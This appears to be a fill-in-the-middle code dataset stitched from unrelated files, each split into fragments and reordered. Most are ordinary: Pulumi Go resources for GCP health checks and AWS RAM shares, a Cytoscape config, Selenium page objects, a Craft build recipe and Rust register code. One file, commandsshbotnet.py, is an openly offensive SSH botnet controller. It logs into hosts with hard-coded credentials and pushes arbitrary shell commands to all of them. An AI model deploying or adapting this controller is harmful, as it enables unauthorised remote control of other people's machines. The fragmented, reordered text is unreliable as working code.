} | // File is a wrapped os.File
File *os.File
} |
inicialization.js | var cy = cytoscape({
container: document.getElementById('cy'),// container to render in
zoom: 1.6,
// wheelSensitivity: 0.2,
style: [ // the stylesheet for the graph
{
selector: 'node',
style: {
'background-color': 'rgba(207, 103, 221, 0.49)',
'color': 'floralwhite',
'label': 'data(id)',
'border-style': 'double',
'border-color': 'floralwhite',
'background-width': '60%',
'background-height': '70%',
// Importa para verificações de edição
'background-image': 'none',
'border-width': '0px',
'font-size': '18px'
//
}
},
{
selector: 'edge',
style: {
'width': 3,
'line-color': 'rgba(193, 85, 255, 0.589)',
'target-arrow-color': 'rgba(190, 65, 221, 0.6)', | 'curve-style': 'bezier',
'label': 'data(label)',
'font-size': '16px',
'color': 'floralwhite'
}
}
],
layout: {
name: 'grid',
rows: 1
}
}); | 'target-arrow-shape': 'triangle', |
healthCheck.go | // *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
// *** Do not edit by hand unless you're certain you know what you are doing! ***
package compute
import (
"reflect"
"github.com/pulumi/pulumi/sdk/v2/go/pulumi"
)
// Health Checks determine whether instances are responsive and able to do work.
// They are an important part of a comprehensive load balancing configuration,
// as they enable monitoring instances behind load balancers.
//
// Health Checks poll instances at a specified interval. Instances that
// do not respond successfully to some number of probes in a row are marked
// as unhealthy. No new connections are sent to unhealthy instances,
// though existing connections will continue. The health check will
// continue to poll unhealthy instances. If an instance later responds
// successfully to some number of consecutive probes, it is marked
// healthy again and can receive new connections.
//
// To get more information about HealthCheck, see:
//
// * [API documentation](https://cloud.google.com/compute/docs/reference/rest/v1/healthChecks)
// * How-to Guides
// * [Official Documentation](https://cloud.google.com/load-balancing/docs/health-checks)
//
// ## Example Usage
type HealthCheck struct {
pulumi.CustomResourceState
// How often (in seconds) to send a health check. The default value is 5
// seconds.
CheckIntervalSec pulumi.IntPtrOutput `pulumi:"checkIntervalSec"`
// Creation timestamp in RFC3339 text format.
CreationTimestamp pulumi.StringOutput `pulumi:"creationTimestamp"`
// An optional description of this resource. Provide this property when
// you create the resource.
Description pulumi.StringPtrOutput `pulumi:"description"`
// A nested object resource
// Structure is documented below.
GrpcHealthCheck HealthCheckGrpcHealthCheckPtrOutput `pulumi:"grpcHealthCheck"`
// A so-far unhealthy instance will be marked healthy after this many
// consecutive successes. The default value is 2.
HealthyThreshold pulumi.IntPtrOutput `pulumi:"healthyThreshold"`
// A nested object resource
// Structure is documented below.
Http2HealthCheck HealthCheckHttp2HealthCheckPtrOutput `pulumi:"http2HealthCheck"`
// A nested object resource
// Structure is documented below.
HttpHealthCheck HealthCheckHttpHealthCheckPtrOutput `pulumi:"httpHealthCheck"`
// A nested object resource
// Structure is documented below.
HttpsHealthCheck HealthCheckHttpsHealthCheckPtrOutput `pulumi:"httpsHealthCheck"`
// Configure logging on this health check. Structure is documented below.
LogConfig HealthCheckLogConfigPtrOutput `pulumi:"logConfig"`
// Name of the resource. Provided by the client when the resource is
// created. The name must be 1-63 characters long, and comply with
// RFC1035. Specifically, the name must be 1-63 characters long and
// match the regular expression `a-z?` which means
// the first character must be a lowercase letter, and all following
// characters must be a dash, lowercase letter, or digit, except the
// last character, which cannot be a dash.
Name pulumi.StringOutput `pulumi:"name"`
// The ID of the project in which the resource belongs.
// If it is not provided, the provider project is used.
Project pulumi.StringOutput `pulumi:"project"`
// The URI of the created resource.
SelfLink pulumi.StringOutput `pulumi:"selfLink"`
// A nested object resource
// Structure is documented below.
SslHealthCheck HealthCheckSslHealthCheckPtrOutput `pulumi:"sslHealthCheck"`
// A nested object resource
// Structure is documented below.
TcpHealthCheck HealthCheckTcpHealthCheckPtrOutput `pulumi:"tcpHealthCheck"`
// How long (in seconds) to wait before claiming failure.
// The default value is 5 seconds. It is invalid for timeoutSec to have
// greater value than checkIntervalSec.
TimeoutSec pulumi.IntPtrOutput `pulumi:"timeoutSec"`
// The type of the health check. One of HTTP, HTTPS, TCP, or SSL.
Type pulumi.StringOutput `pulumi:"type"`
// A so-far healthy instance will be marked unhealthy after this many
// consecutive failures. The default value is 2.
UnhealthyThreshold pulumi.IntPtrOutput `pulumi:"unhealthyThreshold"`
}
// NewHealthCheck registers a new resource with the given unique name, arguments, and options.
func NewHealthCheck(ctx *pulumi.Context,
name string, args *HealthCheckArgs, opts ...pulumi.ResourceOption) (*HealthCheck, error) {
if args == nil {
args = &HealthCheckArgs{}
}
var resource HealthCheck
err := ctx.RegisterResource("gcp:compute/healthCheck:HealthCheck", name, args, &resource, opts...)
if err != nil {
return nil, err
}
return &resource, nil
}
// GetHealthCheck gets an existing HealthCheck resource's state with the given name, ID, and optional
// state properties that are used to uniquely qualify the lookup (nil if not required).
func GetHealthCheck(ctx *pulumi.Context,
name string, id pulumi.IDInput, state *HealthCheckState, opts ...pulumi.ResourceOption) (*HealthCheck, error) |
// Input properties used for looking up and filtering HealthCheck resources.
type healthCheckState struct {
// How often (in seconds) to send a health check. The default value is 5
// seconds.
CheckIntervalSec *int `pulumi:"checkIntervalSec"`
// Creation timestamp in RFC3339 text format.
CreationTimestamp *string `pulumi:"creationTimestamp"`
// An optional description of this resource. Provide this property when
// you create the resource.
Description *string `pulumi:"description"`
// A nested object resource
// Structure is documented below.
GrpcHealthCheck *HealthCheckGrpcHealthCheck `pulumi:"grpcHealthCheck"`
// A so-far unhealthy instance will be marked healthy after this many
// consecutive successes. The default value is 2.
HealthyThreshold *int `pulumi:"healthyThreshold"`
// A nested object resource
// Structure is documented below.
Http2HealthCheck *HealthCheckHttp2HealthCheck `pulumi:"http2HealthCheck"`
// A nested object resource
// Structure is documented below.
HttpHealthCheck *HealthCheckHttpHealthCheck `pulumi:"httpHealthCheck"`
// A nested object resource
// Structure is documented below.
HttpsHealthCheck *HealthCheckHttpsHealthCheck `pulumi:"httpsHealthCheck"`
// Configure logging on this health check. Structure is documented below.
LogConfig *HealthCheckLogConfig `pulumi:"logConfig"`
// Name of the resource. Provided by the client when the resource is
// created. The name must be 1-63 characters long, and comply with
// RFC1035. Specifically, the name must be 1-63 characters long and
// match the regular expression `a-z?` which means
// the first character must be a lowercase letter, and all following
// characters must be a dash, lowercase letter, or digit, except the
// last character, which cannot be a dash.
Name *string `pulumi:"name"`
// The ID of the project in which the resource belongs.
// If it is not provided, the provider project is used.
Project *string `pulumi:"project"`
// The URI of the created resource.
SelfLink *string `pulumi:"selfLink"`
// A nested object resource
// Structure is documented below.
SslHealthCheck *HealthCheckSslHealthCheck `pulumi:"sslHealthCheck"`
// A nested object resource
// Structure is documented below.
TcpHealthCheck *HealthCheckTcpHealthCheck `pulumi:"tcpHealthCheck"`
// How long (in seconds) to wait before claiming failure.
// The default value is 5 seconds. It is invalid for timeoutSec to have
// greater value than checkIntervalSec.
TimeoutSec *int `pulumi:"timeoutSec"`
// The type of the health check. One of HTTP, HTTPS, TCP, or SSL.
Type *string `pulumi:"type"`
// A so-far healthy instance will be marked unhealthy after this many
// consecutive failures. The default value is 2.
UnhealthyThreshold *int `pulumi:"unhealthyThreshold"`
}
type HealthCheckState struct {
// How often (in seconds) to send a health check. The default value is 5
// seconds.
CheckIntervalSec pulumi.IntPtrInput
// Creation timestamp in RFC3339 text format.
CreationTimestamp pulumi.StringPtrInput
// An optional description of this resource. Provide this property when
// you create the resource.
Description pulumi.StringPtrInput
// A nested object resource
// Structure is documented below.
GrpcHealthCheck HealthCheckGrpcHealthCheckPtrInput
// A so-far unhealthy instance will be marked healthy after this many
// consecutive successes. The default value is 2.
HealthyThreshold pulumi.IntPtrInput
// A nested object resource
// Structure is documented below.
Http2HealthCheck HealthCheckHttp2HealthCheckPtrInput
// A nested object resource
// Structure is documented below.
HttpHealthCheck HealthCheckHttpHealthCheckPtrInput
// A nested object resource
// Structure is documented below.
HttpsHealthCheck HealthCheckHttpsHealthCheckPtrInput
// Configure logging on this health check. Structure is documented below.
LogConfig HealthCheckLogConfigPtrInput
// Name of the resource. Provided by the client when the resource is
// created. The name must be 1-63 characters long, and comply with
// RFC1035. Specifically, the name must be 1-63 characters long and
// match the regular expression `a-z?` which means
// the first character must be a lowercase letter, and all following
// characters must be a dash, lowercase letter, or digit, except the
// last character, which cannot be a dash.
Name pulumi.StringPtrInput
// The ID of the project in which the resource belongs.
// If it is not provided, the provider project is used.
Project pulumi.StringPtrInput
// The URI of the created resource.
SelfLink pulumi.StringPtrInput
// A nested object resource
// Structure is documented below.
SslHealthCheck HealthCheckSslHealthCheckPtrInput
// A nested object resource
// Structure is documented below.
TcpHealthCheck HealthCheckTcpHealthCheckPtrInput
// How long (in seconds) to wait before claiming failure.
// The default value is 5 seconds. It is invalid for timeoutSec to have
// greater value than checkIntervalSec.
TimeoutSec pulumi.IntPtrInput
// The type of the health check. One of HTTP, HTTPS, TCP, or SSL.
Type pulumi.StringPtrInput
// A so-far healthy instance will be marked unhealthy after this many
// consecutive failures. The default value is 2.
UnhealthyThreshold pulumi.IntPtrInput
}
func (HealthCheckState) ElementType() reflect.Type {
return reflect.TypeOf((*healthCheckState)(nil)).Elem()
}
type healthCheckArgs struct {
// How often (in seconds) to send a health check. The default value is 5
// seconds.
CheckIntervalSec *int `pulumi:"checkIntervalSec"`
// An optional description of this resource. Provide this property when
// you create the resource.
Description *string `pulumi:"description"`
// A nested object resource
// Structure is documented below.
GrpcHealthCheck *HealthCheckGrpcHealthCheck `pulumi:"grpcHealthCheck"`
// A so-far unhealthy instance will be marked healthy after this many
// consecutive successes. The default value is 2.
HealthyThreshold *int `pulumi:"healthyThreshold"`
// A nested object resource
// Structure is documented below.
Http2HealthCheck *HealthCheckHttp2HealthCheck `pulumi:"http2HealthCheck"`
// A nested object resource
// Structure is documented below.
HttpHealthCheck *HealthCheckHttpHealthCheck `pulumi:"httpHealthCheck"`
// A nested object resource
// Structure is documented below.
HttpsHealthCheck *HealthCheckHttpsHealthCheck `pulumi:"httpsHealthCheck"`
// Configure logging on this health check. Structure is documented below.
LogConfig *HealthCheckLogConfig `pulumi:"logConfig"`
// Name of the resource. Provided by the client when the resource is
// created. The name must be 1-63 characters long, and comply with
// RFC1035. Specifically, the name must be 1-63 characters long and
// match the regular expression `a-z?` which means
// the first character must be a lowercase letter, and all following
// characters must be a dash, lowercase letter, or digit, except the
// last character, which cannot be a dash.
Name *string `pulumi:"name"`
// The ID of the project in which the resource belongs.
// If it is not provided, the provider project is used.
Project *string `pulumi:"project"`
// A nested object resource
// Structure is documented below.
SslHealthCheck *HealthCheckSslHealthCheck `pulumi:"sslHealthCheck"`
// A nested object resource
// Structure is documented below.
TcpHealthCheck *HealthCheckTcpHealthCheck `pulumi:"tcpHealthCheck"`
// How long (in seconds) to wait before claiming failure.
// The default value is 5 seconds. It is invalid for timeoutSec to have
// greater value than checkIntervalSec.
TimeoutSec *int `pulumi:"timeoutSec"`
// A so-far healthy instance will be marked unhealthy after this many
// consecutive failures. The default value is 2.
UnhealthyThreshold *int `pulumi:"unhealthyThreshold"`
}
// The set of arguments for constructing a HealthCheck resource.
type HealthCheckArgs struct {
// How often (in seconds) to send a health check. The default value is 5
// seconds.
CheckIntervalSec pulumi.IntPtrInput
// An optional description of this resource. Provide this property when
// you create the resource.
Description pulumi.StringPtrInput
// A nested object resource
// Structure is documented below.
GrpcHealthCheck HealthCheckGrpcHealthCheckPtrInput
// A so-far unhealthy instance will be marked healthy after this many
// consecutive successes. The default value is 2.
HealthyThreshold pulumi.IntPtrInput
// A nested object resource
// Structure is documented below.
Http2HealthCheck HealthCheckHttp2HealthCheckPtrInput
// A nested object resource
// Structure is documented below.
HttpHealthCheck HealthCheckHttpHealthCheckPtrInput
// A nested object resource
// Structure is documented below.
HttpsHealthCheck HealthCheckHttpsHealthCheckPtrInput
// Configure logging on this health check. Structure is documented below.
LogConfig HealthCheckLogConfigPtrInput
// Name of the resource. Provided by the client when the resource is
// created. The name must be 1-63 characters long, and comply with
// RFC1035. Specifically, the name must be 1-63 characters long and
// match the regular expression `a-z?` which means
// the first character must be a lowercase letter, and all following
// characters must be a dash, lowercase letter, or digit, except the
// last character, which cannot be a dash.
Name pulumi.StringPtrInput
// The ID of the project in which the resource belongs.
// If it is not provided, the provider project is used.
Project pulumi.StringPtrInput
// A nested object resource
// Structure is documented below.
SslHealthCheck HealthCheckSslHealthCheckPtrInput
// A nested object resource
// Structure is documented below.
TcpHealthCheck HealthCheckTcpHealthCheckPtrInput
// How long (in seconds) to wait before claiming failure.
// The default value is 5 seconds. It is invalid for timeoutSec to have
// greater value than checkIntervalSec.
TimeoutSec pulumi.IntPtrInput
// A so-far healthy instance will be marked unhealthy after this many
// consecutive failures. The default value is 2.
UnhealthyThreshold pulumi.IntPtrInput
}
func (HealthCheckArgs) ElementType() reflect.Type {
return reflect.TypeOf((*healthCheckArgs)(nil)).Elem()
}
| {
var resource HealthCheck
err := ctx.ReadResource("gcp:compute/healthCheck:HealthCheck", name, id, state, &resource, opts...)
if err != nil {
return nil, err
}
return &resource, nil
} |
users.types.ts | import { Document, Model } from 'mongoose'
import { UserEntity } from '@domain/qrCode/entities/user'
export interface IUserDocument extends UserEntity, Document {}
export interface IUserModel extends Model<IUserDocument> { | findByEmail: (this: IUserModel, email: string) => Promise<IUserDocument>
} |
|
base_page.py | import math
import time
from .locators import BasePageLocators
from selenium.common.exceptions import NoSuchElementException, NoAlertPresentException, TimeoutException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
class BasePage():
def __init__(self, browser, url, timeout=10):
self.browser = browser
self.url = url
self.browser.implicitly_wait(timeout)
def go_to_basket_page(self):
link = self.browser.find_element(*BasePageLocators.BASKET_BUTTON)
link.click()
def go_to_login_page(self):
link = self.browser.find_element(*BasePageLocators.LOGIN_LINK)
link.click()
def is_disappeared(self, how, what, timeout=4):
try:
WebDriverWait(self.browser, timeout, 1, TimeoutException).\
until_not(EC.presence_of_element_located((how, what)))
except TimeoutException:
return False
return True
def is_element_present(self, how, what):
|
def is_not_element_present(self, how, what, timeout=4):
try:
WebDriverWait(self.browser, timeout).until(EC.presence_of_element_located((how, what)))
except TimeoutException:
return True
return False
def open(self):
self.browser.get(self.url)
def should_be_authorized_user(self):
assert self.is_element_present(*BasePageLocators.USER_ICON), "User icon is not presented," \
" probably unauthorised user"
def should_be_basket_button(self):
assert self.is_element_present(*BasePageLocators.BASKET_BUTTON)
def should_be_login_link(self):
assert self.is_element_present(*BasePageLocators.LOGIN_LINK), "Login link is not presented"
def solve_quiz_and_get_code(self):
alert = self.browser.switch_to.alert
x = alert.text.split(" ")[2]
answer = str(math.log(abs((12 * math.sin(float(x))))))
alert.send_keys(answer)
alert.accept()
try:
alert = self.browser.switch_to.alert
alert_text = alert.text
print(f"Your code: {alert_text}")
alert.accept()
except NoAlertPresentException:
print("No second alert presented")
| try:
self.browser.find_element(how, what)
except NoSuchElementException:
return False
return True |
qca.py | import info
class subinfo(info.infoclass):
def setDependencies(self):
self.runtimeDependencies["virtual/base"] = None
self.runtimeDependencies["libs/qt5/qtbase"] = None
self.runtimeDependencies["libs/openssl"] = None
self.runtimeDependencies["libs/cyrus-sasl"] = None
def setTargets(self):
self.description = "Qt Cryptographic Architecture (QCA)"
self.svnTargets["master"] = "https://anongit.kde.org/qca.git"
# latest stable version
self.defaultTarget = "2.3.3"
self.targets[self.defaultTarget] = f"https://download.kde.org/stable/qca/{self.defaultTarget}/qca-{self.defaultTarget}.tar.xz"
self.targetDigestUrls[self.defaultTarget] = f"https://download.kde.org/stable/qca/{self.defaultTarget}/qca-{self.defaultTarget}.tar.xz.sha256"
self.targetInstSrc[self.defaultTarget] = f"qca-{self.defaultTarget}"
self.patchToApply[self.defaultTarget] = [("msvc.diff", 1)]
self.patchLevel[self.defaultTarget] = 1
from Package.CMakePackageBase import *
class | (CMakePackageBase):
def __init__(self, **args):
CMakePackageBase.__init__(self)
# the cmake config is not relocatable
self.subinfo.options.package.disableBinaryCache = True
# tests fail to build with missing openssl header
self.subinfo.options.configure.args = "-DBUILD_TESTS=OFF "
| Package |
asia.rs | extern crate geo;
pub fn get_polygon() -> geo::Polygon<f32> | {
let exterior = geo::LineString::from(vec![
(-168.250000, 77.700000),
(-180.000000, 77.700000),
(-180.000000, 58.100000),
(-168.250000, 58.100000),
(-168.250000, 77.700000),
]);
let interior = vec![geo::LineString::from(vec![
(39.690800, 84.526660),
(180.000000, 84.384870),
(180.000000, 26.278830),
(142.084541, 22.062707),
(130.147000, 3.608598),
(141.137300, -1.666358),
(141.043800, -9.784795),
(130.264500, -10.039900),
(118.254500, -13.011650),
(102.797500, -8.388008),
(89.504510, -11.141700),
(61.625110, -9.103512),
(51.626450, 12.548650),
(44.207750, 11.678600),
(39.780160, 16.568550),
(31.604010, 31.586410),
(33.277690, 34.000570),
(34.767400, 34.853470),
(35.724230, 36.326860),
(36.559700, 37.664390),
(44.105300, 37.984380),
(43.016380, 41.271910),
(41.283040, 41.412740),
(36.263780, 44.407720),
(36.613150, 45.587230),
(37.484930, 46.809240),
(38.274970, 47.613170),
(39.561640, 48.431410),
(39.772640, 50.588910),
(39.690800, 84.526660),
])];
geo::Polygon::new(exterior, interior)
} |
|
resourceShareAccepter.go | // *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
// *** Do not edit by hand unless you're certain you know what you are doing! ***
package ram
import (
"reflect"
"github.com/pkg/errors"
"github.com/pulumi/pulumi/sdk/v2/go/pulumi"
)
// Manage accepting a Resource Access Manager (RAM) Resource Share invitation. From a _receiver_ AWS account, accept an invitation to share resources that were shared by a _sender_ AWS account. To create a resource share in the _sender_, see the `ram.ResourceShare` resource.
//
// > **Note:** If both AWS accounts are in the same Organization and [RAM Sharing with AWS Organizations is enabled](https://docs.aws.amazon.com/ram/latest/userguide/getting-started-sharing.html#getting-started-sharing-orgs), this resource is not necessary as RAM Resource Share invitations are not used.
//
// ## Example Usage
//
// This configuration provides an example of using multiple AWS providers to configure two different AWS accounts. In the _sender_ account, the configuration creates a `ram.ResourceShare` and uses a data source in the _receiver_ account to create a `ram.PrincipalAssociation` resource with the _receiver's_ account ID. In the _receiver_ account, the configuration accepts the invitation to share resources with the `ram.ResourceShareAccepter`.
//
// ```go
// package main
//
// import (
// "github.com/pulumi/pulumi-aws/sdk/v3/go/aws"
// "github.com/pulumi/pulumi-aws/sdk/v3/go/aws/providers"
// "github.com/pulumi/pulumi-aws/sdk/v3/go/aws/ram"
// "github.com/pulumi/pulumi/sdk/v2/go/pulumi"
// )
//
// func main() {
// pulumi.Run(func(ctx *pulumi.Context) error {
// _, err := providers.Newaws(ctx, "alternate", &providers.awsArgs{
// Profile: pulumi.String("profile1"),
// })
// if err != nil {
// return err
// }
// senderShare, err := ram.NewResourceShare(ctx, "senderShare", &ram.ResourceShareArgs{
// AllowExternalPrincipals: pulumi.Bool(true),
// Tags: pulumi.StringMap{
// "Name": pulumi.String("tf-test-resource-share"),
// },
// }, pulumi.Provider(aws.Alternate))
// if err != nil {
// return err
// }
// receiver, err := aws.GetCallerIdentity(ctx, nil, nil)
// if err != nil {
// return err
// }
// senderInvite, err := ram.NewPrincipalAssociation(ctx, "senderInvite", &ram.PrincipalAssociationArgs{
// Principal: pulumi.String(receiver.AccountId),
// ResourceShareArn: senderShare.Arn,
// }, pulumi.Provider(aws.Alternate))
// if err != nil {
// return err
// }
// _, err = ram.NewResourceShareAccepter(ctx, "receiverAccept", &ram.ResourceShareAccepterArgs{
// ShareArn: senderInvite.ResourceShareArn,
// })
// if err != nil {
// return err
// }
// return nil
// })
// }
// ```
type ResourceShareAccepter struct {
pulumi.CustomResourceState
// The ARN of the resource share invitation.
InvitationArn pulumi.StringOutput `pulumi:"invitationArn"`
// The account ID of the receiver account which accepts the invitation.
ReceiverAccountId pulumi.StringOutput `pulumi:"receiverAccountId"`
// A list of the resource ARNs shared via the resource share.
Resources pulumi.StringArrayOutput `pulumi:"resources"`
// The account ID of the sender account which submits the invitation.
SenderAccountId pulumi.StringOutput `pulumi:"senderAccountId"`
// The ARN of the resource share.
ShareArn pulumi.StringOutput `pulumi:"shareArn"`
// The ID of the resource share as displayed in the console.
ShareId pulumi.StringOutput `pulumi:"shareId"`
// The name of the resource share.
ShareName pulumi.StringOutput `pulumi:"shareName"`
// The status of the resource share (ACTIVE, PENDING, FAILED, DELETING, DELETED).
Status pulumi.StringOutput `pulumi:"status"`
}
// NewResourceShareAccepter registers a new resource with the given unique name, arguments, and options.
func NewResourceShareAccepter(ctx *pulumi.Context,
name string, args *ResourceShareAccepterArgs, opts ...pulumi.ResourceOption) (*ResourceShareAccepter, error) {
if args == nil || args.ShareArn == nil {
return nil, errors.New("missing required argument 'ShareArn'")
}
if args == nil {
args = &ResourceShareAccepterArgs{}
}
var resource ResourceShareAccepter
err := ctx.RegisterResource("aws:ram/resourceShareAccepter:ResourceShareAccepter", name, args, &resource, opts...)
if err != nil {
return nil, err
}
return &resource, nil
}
// GetResourceShareAccepter gets an existing ResourceShareAccepter resource's state with the given name, ID, and optional
// state properties that are used to uniquely qualify the lookup (nil if not required).
func | (ctx *pulumi.Context,
name string, id pulumi.IDInput, state *ResourceShareAccepterState, opts ...pulumi.ResourceOption) (*ResourceShareAccepter, error) {
var resource ResourceShareAccepter
err := ctx.ReadResource("aws:ram/resourceShareAccepter:ResourceShareAccepter", name, id, state, &resource, opts...)
if err != nil {
return nil, err
}
return &resource, nil
}
// Input properties used for looking up and filtering ResourceShareAccepter resources.
type resourceShareAccepterState struct {
// The ARN of the resource share invitation.
InvitationArn *string `pulumi:"invitationArn"`
// The account ID of the receiver account which accepts the invitation.
ReceiverAccountId *string `pulumi:"receiverAccountId"`
// A list of the resource ARNs shared via the resource share.
Resources []string `pulumi:"resources"`
// The account ID of the sender account which submits the invitation.
SenderAccountId *string `pulumi:"senderAccountId"`
// The ARN of the resource share.
ShareArn *string `pulumi:"shareArn"`
// The ID of the resource share as displayed in the console.
ShareId *string `pulumi:"shareId"`
// The name of the resource share.
ShareName *string `pulumi:"shareName"`
// The status of the resource share (ACTIVE, PENDING, FAILED, DELETING, DELETED).
Status *string `pulumi:"status"`
}
type ResourceShareAccepterState struct {
// The ARN of the resource share invitation.
InvitationArn pulumi.StringPtrInput
// The account ID of the receiver account which accepts the invitation.
ReceiverAccountId pulumi.StringPtrInput
// A list of the resource ARNs shared via the resource share.
Resources pulumi.StringArrayInput
// The account ID of the sender account which submits the invitation.
SenderAccountId pulumi.StringPtrInput
// The ARN of the resource share.
ShareArn pulumi.StringPtrInput
// The ID of the resource share as displayed in the console.
ShareId pulumi.StringPtrInput
// The name of the resource share.
ShareName pulumi.StringPtrInput
// The status of the resource share (ACTIVE, PENDING, FAILED, DELETING, DELETED).
Status pulumi.StringPtrInput
}
func (ResourceShareAccepterState) ElementType() reflect.Type {
return reflect.TypeOf((*resourceShareAccepterState)(nil)).Elem()
}
type resourceShareAccepterArgs struct {
// The ARN of the resource share.
ShareArn string `pulumi:"shareArn"`
}
// The set of arguments for constructing a ResourceShareAccepter resource.
type ResourceShareAccepterArgs struct {
// The ARN of the resource share.
ShareArn pulumi.StringInput
}
func (ResourceShareAccepterArgs) ElementType() reflect.Type {
return reflect.TypeOf((*resourceShareAccepterArgs)(nil)).Elem()
}
| GetResourceShareAccepter |
commandsshbotnet.py | #!usr/bin/env python
##########################################################
# #
# commandsshbotnet.py #
# author: @shipcod3 #
# inspired by the mass ssh botnet in " Violent Python " #
# #
##########################################################
import optparse
import pxssh
import sys
print "[*-*] Engine start..........\n"
print """
.___ ____ _____ .__.__
____ ____ _____ _____ _____ ____ __| _/ / _ \ ____ ____ ____ ________ __ ___________ _/ ____\____ |__| |
_/ ___\/ _ \ / \ / \\__ \ / \ / __ | > _ </\ _/ ___\/ _ \ / \ / ____/ | \_/ __ \_ __ \ \ __\\__ \ | | |
\ \__( <_> ) Y Y \ Y Y \/ __ \| | \/ /_/ | / <_\ \/ \ \__( <_> ) | < <_| | | /\ ___/| | \/ | | / __ \| | |__
\___ >____/|__|_| /__|_| (____ /___| /\____ | \_____\ \ \___ >____/|___| /\__ |____/ \___ >__| |__| (____ /__|____/
\/ \/ \/ \/ \/ \/ \/ \/ \/ |__| \/ \/
""""
class Client:
def __init__(self, host, user, password):
self.host = host
self.user = user
self.password = password
self.session = self.connect()
def connect(self):
try:
s = pxssh.pxssh()
s.login(self.host, self.user, self.password)
return s
except:
print '[-] Error Connecting'
def send_command(self, cmd):
self.session.sendline(cmd)
self.session.prompt() #match the prompt
return self.session.before # print everything before the prompt
def usage():
print """
*********
Commands:
*********
python commandsshbotnet.py os <command> - For control"
python commandsshbotnet.py info - Print information"
"""
def main(argv):
if len(argv) < 2:
return usage()
arg_command = sys.argv[1]
def botnetCommand(command):
for client in botNet:
output = client.send_command(command)
print '[*] IP: ' + client.host
print '[+] Command: ' + output
def info(command):
for client in botNet:
output = client.send_command(command)
print '[*] IP: ' + client.host
print output.strip('uname -a;uptime')
def | (host, user, password):
client = Client(host, user, password)
botNet.append(client)
botNet = []
#add your host, user, and password here
addClient('127.0.0.1', 'celso', 'celso123') #sample config
addClient('127.0.0.2', 'celso', 'celso123')
if arg_command == "os":
try:
os_command = sys.argv[2]
botnetCommand(os_command)
except:
return usage()
elif arg_command == "info":
info("uname -a;uptime")
else:
return usage()
if __name__ == "__main__":
main(sys.argv)
###
#
# I have been contributing to Metasploit modules lately which pwns IRC Botnets lately and will comeup with a PoC
# for these kind of bots soon. More IRC Bot exploits: https://github.com/shipcod3/IRC-Bot-Hunters
# - shipcod3
###
| addClient |
afrh.rs | #[doc = "Reader of register AFRH"]
pub type R = crate::R<u32, super::AFRH>;
#[doc = "Writer for register AFRH"]
pub type W = crate::W<u32, super::AFRH>;
#[doc = "Register AFRH `reset()`'s with value 0"]
impl crate::ResetValue for super::AFRH {
type Type = u32;
#[inline(always)]
fn reset_value() -> Self::Type {
0
}
}
#[doc = "Reader of field `AFRH15`"]
pub type AFRH15_R = crate::R<u8, u8>;
#[doc = "Write proxy for field `AFRH15`"]
pub struct AFRH15_W<'a> {
w: &'a mut W,
}
impl<'a> AFRH15_W<'a> {
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub unsafe fn bits(self, value: u8) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x0f << 28)) | (((value as u32) & 0x0f) << 28);
self.w
}
}
#[doc = "Reader of field `AFRH14`"]
pub type AFRH14_R = crate::R<u8, u8>;
#[doc = "Write proxy for field `AFRH14`"]
pub struct AFRH14_W<'a> {
w: &'a mut W,
}
impl<'a> AFRH14_W<'a> {
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub unsafe fn bits(self, value: u8) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x0f << 24)) | (((value as u32) & 0x0f) << 24);
self.w
}
}
#[doc = "Reader of field `AFRH13`"]
pub type AFRH13_R = crate::R<u8, u8>;
#[doc = "Write proxy for field `AFRH13`"]
pub struct AFRH13_W<'a> {
w: &'a mut W,
}
impl<'a> AFRH13_W<'a> {
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub unsafe fn bits(self, value: u8) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x0f << 20)) | (((value as u32) & 0x0f) << 20);
self.w
}
}
#[doc = "Reader of field `AFRH12`"]
pub type AFRH12_R = crate::R<u8, u8>;
#[doc = "Write proxy for field `AFRH12`"]
pub struct AFRH12_W<'a> {
w: &'a mut W,
}
impl<'a> AFRH12_W<'a> {
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub unsafe fn bits(self, value: u8) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x0f << 16)) | (((value as u32) & 0x0f) << 16);
self.w
}
}
#[doc = "Reader of field `AFRH11`"]
pub type AFRH11_R = crate::R<u8, u8>;
#[doc = "Write proxy for field `AFRH11`"]
pub struct AFRH11_W<'a> {
w: &'a mut W,
}
impl<'a> AFRH11_W<'a> {
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub unsafe fn bits(self, value: u8) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x0f << 12)) | (((value as u32) & 0x0f) << 12);
self.w
}
}
#[doc = "Reader of field `AFRH10`"]
pub type AFRH10_R = crate::R<u8, u8>;
#[doc = "Write proxy for field `AFRH10`"]
pub struct AFRH10_W<'a> {
w: &'a mut W,
}
impl<'a> AFRH10_W<'a> {
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub unsafe fn bits(self, value: u8) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x0f << 8)) | (((value as u32) & 0x0f) << 8);
self.w
}
}
#[doc = "Reader of field `AFRH9`"]
pub type AFRH9_R = crate::R<u8, u8>;
#[doc = "Write proxy for field `AFRH9`"]
pub struct AFRH9_W<'a> {
w: &'a mut W,
}
impl<'a> AFRH9_W<'a> {
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub unsafe fn bits(self, value: u8) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x0f << 4)) | (((value as u32) & 0x0f) << 4);
self.w
}
}
#[doc = "Reader of field `AFRH8`"]
pub type AFRH8_R = crate::R<u8, u8>;
#[doc = "Write proxy for field `AFRH8`"]
pub struct AFRH8_W<'a> {
w: &'a mut W,
}
impl<'a> AFRH8_W<'a> {
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub unsafe fn bits(self, value: u8) -> &'a mut W {
self.w.bits = (self.w.bits & !0x0f) | ((value as u32) & 0x0f);
self.w
}
}
impl R {
#[doc = "Bits 28:31 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh15(&self) -> AFRH15_R {
AFRH15_R::new(((self.bits >> 28) & 0x0f) as u8)
}
#[doc = "Bits 24:27 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
